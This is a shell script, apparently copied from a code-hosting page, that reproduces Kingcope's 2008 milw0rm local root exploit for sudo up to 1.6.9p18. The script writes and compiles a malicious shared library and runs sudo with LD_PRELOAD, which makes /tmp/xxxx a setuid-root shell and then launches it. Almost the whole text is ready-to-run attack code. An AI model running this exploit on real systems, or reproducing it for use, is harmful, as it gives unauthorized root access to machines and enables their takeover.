65 lines
No EOL
1.5 KiB
Bash
Executable file
65 lines
No EOL
1.5 KiB
Bash
Executable file
#!/bin/sh
|
|
#* Sudo <= 1.6.9p18 local r00t exploit
|
|
#* by Kingcope/2008/www.com-winner.com
|
|
#
|
|
# Most lame exploit EVER!
|
|
#
|
|
# Needs a special configuration in the sudoers file:
|
|
# --->>>>> "Defaults setenv" so environ vars are preserved :) <<<<<---
|
|
#
|
|
# May also need the current users password to be typed in
|
|
# So this exploit is UBERLAME!
|
|
# First Argument to this shell file: A program your current
|
|
# user is allowed to execute via sudo. sudo has to be in
|
|
# the path!!
|
|
# successfully tested on FreeBSD-7.0 and RedHat Linux
|
|
# I don't even know why I realease such stuffz
|
|
# I'M GONNA GRAB A COFFE NOW;HAVE PHUN !!!
|
|
|
|
echo "Sudo <= 1.6.9p18 local r00t exploit"
|
|
echo "by Kingcope/2008/www.com-winner.com"
|
|
|
|
if [$1 == ""]; then
|
|
echo "Please give me a program to run via sudo."
|
|
echo "Allowed programs:"
|
|
sudo -l
|
|
exit
|
|
fi
|
|
|
|
cat > program.c << _EOF
|
|
#include <unistd.h>
|
|
#include <stdio.h>
|
|
#include <sys/types.h>
|
|
#include <stdlib.h>
|
|
|
|
void _init()
|
|
{
|
|
if (!geteuid()) {
|
|
unsetenv("LD_PRELOAD");
|
|
setgid(0);
|
|
setuid(0);
|
|
execl("/bin/sh","sh","-c","chown 0:0 /tmp/xxxx; /bin/chmod +xs /tmp/xxxx",NULL);
|
|
}
|
|
}
|
|
|
|
_EOF
|
|
|
|
cat > xxxx.c << _EOF
|
|
int main(void) {
|
|
setgid(0); setuid(0);
|
|
// unlink("/tmp/xxxx");
|
|
execl("/bin/sh","sh",0); }
|
|
_EOF
|
|
|
|
gcc -o /tmp/xxxx xxxx.c
|
|
gcc -o program.o -c program.c -fPIC
|
|
gcc -shared -Wl,-soname,libno_ex.so.1 -o /tmp/libno_ex.so.1.0 program.o -nostartfiles
|
|
sudo LD_PRELOAD=/tmp/libno_ex.so.1.0 $1
|
|
if [ -f /tmp/xxxx ]; then
|
|
echo "CONGRATULATIONS, IT'S A ROOTSHELL!"
|
|
/tmp/xxxx
|
|
else
|
|
echo "Sorry, exploit failed. No envvars allowed?"
|
|
fi
|
|
|
|
# milw0rm.com [2008-11-15] |